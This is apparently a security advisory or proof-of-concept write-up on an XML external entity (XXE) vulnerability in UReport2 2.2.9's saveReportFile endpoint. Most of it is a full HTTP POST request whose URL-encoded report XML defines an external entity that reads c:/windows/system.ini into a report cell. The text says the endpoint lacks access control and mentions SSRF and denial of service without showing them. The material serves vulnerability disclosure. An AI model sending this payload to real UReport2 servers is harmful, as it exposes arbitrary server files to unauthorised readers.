Ureport2 XXE Author:idam0n
The interface for saving reports does not disable external entity parsing when parsing xml data, resulting in the possibility of submitting malicious data for injection of xml external entities, reading arbitrary files in the operating system, and causing ssrf to detect intranet information by writing a large number of cyclically called entities Carry out dos attacks, etc.
The vulnerable code at file:ureport2-core-2.2.9.jar method:com.bstek.ureport.parser.ReportParser.parse
as the picture:

It is found that the program directly reads the xml information, and it is not configured to prohibit external entity references, resulting in xxe
Reproduce the local build environment: Use idea to build a Springboot demo project and introduce ureport2:
Exploiting the Vulnerability
now add the xxe payload to post program 'content'
the xml content with payload:

POST /ureport/designer/saveReportFile HTTP/1.1 Host: 192.168.66.39:8881 Content-Length: 3936 Accept: / Origin: http://192.168.66.39:8881 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.66.39:8881/ureport/designer Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=F988AAC7F0ED6210948EE2DB114A8A86 Connection: close
file=file%3Atets1.ureport.xml&content=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE+x+%5B+%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fsystem.ini%22%3E%5D%3E%3Cureport%3E%3Ccell+expand%3D%22None%22+name%3D%22A1%22+row%3D%221%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B1%22+row%3D%221%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C1%22+row%3D%221%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D1%22+row%3D%221%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22A2%22+row%3D%222%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B2%22+row%3D%222%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C2%22+row%3D%222%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D2%22+row%3D%222%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22A3%22+row%3D%223%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B3%22+row%3D%223%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C3%22+row%3D%223%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D3%22+row%3D%223%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%26xxe%3B%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Crow+row-number%3D%221%22+height%3D%2218%22%2F%3E%3Crow+row-number%3D%222%22+height%3D%2218%22%2F%3E%3Crow+row-number%3D%223%22+height%3D%2218%22%2F%3E%3Ccolumn+col-number%3D%221%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%222%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%223%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%224%22+width%3D%2280%22%2F%3E%3Cpaper+type%3D%22A4%22+left-margin%3D%2290%22+right-margin%3D%2290%22%0A++++top-margin%3D%2272%22+bottom-margin%3D%2272%22+paging-mode%3D%22fitpage%22+fixrows%3D%220%22%0A++++width%3D%22595%22+height%3D%22842%22+orientation%3D%22portrait%22+html-report-align%3D%22left%22+bg-image%3D%22%22+html-interval-refresh-value%3D%220%22+column-enabled%3D%22false%22%3E%3C%2Fpaper%3E%3C%2Fureport%3E
now open the report we can get the file content at c:/windows/system.ini

It should also be noted that,the function has no access control so it can be accessed by any user.
And for more, An XML External Entity (XXE) can also cause ssrf and dos
ssrf:




